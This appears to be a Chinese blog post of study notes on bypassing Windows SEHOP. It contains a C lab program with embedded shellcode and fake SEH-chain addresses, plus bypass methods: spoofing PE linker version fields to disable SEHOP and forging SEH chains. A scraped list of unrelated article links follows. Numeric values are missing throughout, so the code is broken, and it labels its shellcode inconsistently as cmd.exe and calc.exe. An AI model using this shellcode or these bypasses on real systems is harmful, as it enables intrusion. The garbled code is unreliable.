SEHOP,Structed Exception Handling Overwrite Protection,一种比 SafeSEH 更严厉的保护机制。Windows Vista SP1 开始支持 SEHOP,但 Vista 和 Win7 中默认不启用,可以对这两个版本的系统打补丁以支持 SEHOP,但一个更简单的方法是:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\DisableExceptionChainValidation = dword:

可以写一个带 _try{} _except() 的简单程序,用 OllyDbg 加载然后修改 next seh 链表来对比观察 win7 启用 SEHOP 后的保护效果。我写了一段不算方便的代码来实验,因为其中有个宏可以在以后借用,先存下来:

 // sehop.cpp : Defines the entry point for the console application.
//
// os: win7
// ide: vs2008 (turn off Optimization/ASLR/GS/DEP)
// link option: /SAFESEH:NO #include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h> #define D2B(x,c) ((byte)(((unsigned int)x)>>(32-c*8))) // Dword to Byte char shellcode[]=
"\x60\x89\xE0\x83\xE4\xFC\x50\x31\xD2\x52\x68\x63\x61\x6C\x63\x54"
"\x59\x52\x51\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30"
"\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE"
"\x8B\x54\x1F\x24\x0F\xB7\x2C\x17\x42\x42\xAD\x81\x3C\x07\x57\x69"
"\x6E\x45\x75\xF0\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7\x58"
"\x58\x5C\x61\xC3" // 84b winexec cmd.exe shellcode
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x78\xFF\x12\x00" // next seh
"\x18\x30\x40\x00" // seh : shellcode
; void test()
{
char buf[];
memcpy(buf,shellcode,);
int x=;
__try{
x=/x;
} __except() {
printf("[fatal] divided by zero!\n");
__asm{
lea eax,shellcode
call eax // push next_eip, jmp eax
}
exit();
}
} int _tmain(int argc, _TCHAR* argv[])
{
test();
return ;
}

注意其中的 D2B() 宏,在代码中动态定位时可以借用(sprintf(address,"%c%c%c%c",D2B(seh,4),D2B(seh,3),D2B(seh,2),D2B(seh,1))),另外,弹出 calc.exe 的 shellcode 具有 function 特性,即执行过程中会保存现场,执行完了会返回,实验时应该用 lea eax, shellcode; call eax(call eax 会先 push next_eip 再 jmp)

栈帧中的 S.E.H 函数是以单链表的形式存放的:node(next_seh,eh) -> node(next_seh,eh) -> ... -> node(0xFFFFFFFF,system_final_eh)

SEHOP 的任务就是在转入异常处理之前检查 S.E.H 链表的最后一个节点是否为 system_final_eh,如果是则检测成功,否则失败:

 if (process_flag & 0x40 == )            // 如果没有 SEH 记录则不进行检测
{
if (record != 0xFFFFFFFF) // 开始检测
{
do {
if (record < stack_bottom || record > stack_top) // SEH 记录必须位于栈中
goto corruption;
if ((char*)record + sizeof(EXCEPTION_REGISTRATION) > stack_top) // SEH 结构完全在栈中
goto corruption;
if ((record & ) !=) // SEH 记录必须 4 字节对齐
goto corruption;
handler = record -> handler;
if (handler >= stack_bottom && handler < stack_top) // SEH 处理函数不能在栈中
goto corruption;
record = record -> next; // 继续遍历
} while (record != 0xFFFFFFFF);
if ((TEB -> word_at_offset_0xFCA & 0x200) != )
if (handler != &FinalExceptionHandler) // 核心检测:未节点是否为系统 EH
goto corruption;
}
}

作为对 SafeSEH 强有力的补充,SEHOP 检查发生在 SafeSEH 的 RtlIsValidHandler 函数校验前,这样一来,利用攻击加载模块之外的地址、堆地址和未启用 SafeSEH 模块的方法都行不通了。理论上,剩下的攻击思路只有三条:

  因为 SEHOP 只对 SEH 提供保护,故避开 SEH,攻击返回地址(或 GS 关闭)或虚函数等
利用未启用 SEHOP 的模块
伪造 SEH 链

利用未启用 SEHOP 的模块

微软在编译器中没有提供关闭 SEHOP 的选项,但出于兼容性考虑,对一些程序禁用了 SEHOP,例如经过 Armadilo 加壳的软件。

操作系统会根据 PE 头中的 MajorLinkerVersion MinorLinkerVersion 来判断是否为程序禁用 SEHOP。如果将这两个选项分别设置为 0x53 和 0x52 来模拟经过 Armadilo 加壳的程序,就可以禁用 SEHOP 了(可以用 CFF Explorer 打开程序,在 Optional Header 中进行设置)。

可以用这种方法并结合 利用未启用 SafeSEH 的模块绕过 SafeSEH 一节来绕过 SEHOP 和 SafeSEH。

伪造 S.E.H 链

实际环境中,要实现 S.E.H 的伪造是非常困难的事,因为前提条件很多:

. 首先要求系统 ASLR 不能启用,否则 FinalExceptionHandler 地址在重启后会变动,溢出质量大大降低。
. 伪造的 S.E.H 所处的位置必须在当前栈中,且能被 整除。
. 伪造的 S.E.H 中的 next_seh 必须指向正常的 seh 链,其未节点必须是 FinalExceptionHandler。
. 突破 SEHOP 后还需要突破 SafeSEH。

书中的示例用了 利用未启用 SafeSEH 的模块绕过 SafeSEH 一节中的 dll 模块,并且关闭了 DEP 和 ASLR。

Win7 不能通过 int 3 转入 OllyDbg 调试,只能直接用 OllyDbg 加载程序调试,为什么呢?

OD: SEHOP的更多相关文章

  1. Linux之od命令详解

    功能说明:输出文件内容.语 法:od [-abcdfhilovx][-A <字码基数>][-j <字符数目>][-N <字符数目>][-s <字符串字符数&g ...

  2. 基本shell编程【3】- 常用的工具awk\sed\sort\uniq\od

    awk awk是个很好用的东西,大量使用在linux系统分析的结果展示处理上.并且可以使用管道, input | awk ''  | output 1.首先要知道形式 awk 'command' fi ...

  3. od 查看特殊格式的文件内容

    用户通常使用od命令查看特殊格式的文件内容.通过指定该命令的不同选项可以以十进制.八进制.十六进制和ASCII码来显示文件. 语法: od [选项] 文件- 命令中各选项的含义: - A 指定地址基数 ...

  4. 游戏外挂四之利用CE和OD查找被选中怪物和怪物列表

    合肥程序员群:49313181.    合肥实名程序员群:128131462 (不愿透露姓名和信息者勿加入)Q  Q:408365330     E-Mail:egojit@qq.com 这一节我们利 ...

  5. OD调试17

    程序先出现一个nag 然后出现主窗口 然后出现第二个nag窗口        我们查个壳   没有壳 那就载入OD看看,继续用调用堆栈的方法 发现一直执行用的都是这一个call,最后执行到程序结束.之 ...

  6. OD调试16

    今天还是15的那个程序,但是呢,换一种方法去掉NAG窗口 用OD载入,暂停,查看调用的堆栈 先看最后一个    查看调用,下断点 往上看看,找到入口的地方,设下断.点,重载,运行,单步 通过单步发现 ...

  7. OD调试15

    可以达到不脱壳的妙用.含义:把补丁写入程序代码,就叫内嵌补丁 那我们先看看今天的程序 是一个写DVD目录的程序,点continue就可以进入使用了      发现一个还有29天 就过期了   ,点en ...

  8. Delphi_OD_代码_调试_Delphi反调试技术(以OD为例附核心原代码) (转)

    1.程序窗口[chuang kou]句柄[ju bing]检测原理:用FindWindow函数[han shu]查找[cha zhao]具有相同窗口[chuang kou]类名和标题的窗口[chuan ...

  9. OD使用教程11

    首先把安装好的软件拖入PEID,看看它是用什么语言写的    然后用OD载入程序,查找关键字,步骤看上一个笔记 双击到达代码处,发现这在一个跳转里面.可能第一反应是修改跳转,经试验后发现这是没用的所以 ...

随机推荐

  1. asp.net使用Mysql乱码处理

    在asp.net与mysql数据库打交道的时候,由于配置的问题,会遇到自己写的方法在读取数据库中数据的时候,英文,数字可以正常通过,但是中文就无法通过,以登录为例(方法略),当输入英文用户名的时候可以 ...

  2. ThinkInJava4读书笔记之第七章隐藏实施过程

    第7章 多形性 上溯造型:将一个对象作为它自己的类型使用,或者作为它的基础类型的一个对象使用.取得一个对象句柄,并将其作为基础类型句柄使用. 方法调用的绑定:将一个方法调用同一个方法主体连接到一起就称 ...

  3. 百度地图api窗口信息自定义

    百度地图加载完后,完全可以用dom方法操作,比较常用的就是点击mark的弹窗,利用jQuery可以很快的创建弹窗,需要注意的就是地图都是异步加载,所以绑定时间要用 jQuery 事件 - delega ...

  4. php错误级别设置

    在php.ini中可以设置服务器对错误的报警级别.在默认情况下,php将报告除了通知之外的所有错误. 错误报告级别是通过一些预定义的常量来设置的, 语法 int error_reporting ( [ ...

  5. 关于PHP参数的引用传递和值传递

    如果希望编写一个名为increment()的函数来增加一个变量的值,我们可能会按如下方式编写这个函数: 这段代码是没有用的.下面测试代码的输出结果是“10”. $value 的内容没有被修改.这要归因 ...

  6. 转:Backbone与Angular的比较

    原文来自于:http://www.infoq.com/cn/articles/backbone-vs-angular 将不同的思想和工具进行对比,是一种更好地理解它们的方式.在本文中,我首先将列举在创 ...

  7. poj 2406Power Strings

    http://poj.org/problem?id=2406 #include<cstdio> #include<cstring> #include<algorithm& ...

  8. poj Candies

    http://poj.org/problem?id=3159 #include<cstdio> #include<queue> #include<cstring> ...

  9. [Android] AudioTrack::start

    AudioTrack的start方法用于实现Android的音频输出,start究竟做了什么?回顾一下上一小节createTrack_l的最后部分,通过binder返回了一个Track的句柄,并以被保 ...

  10. -_-#【Backbone】Model

    <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title> ...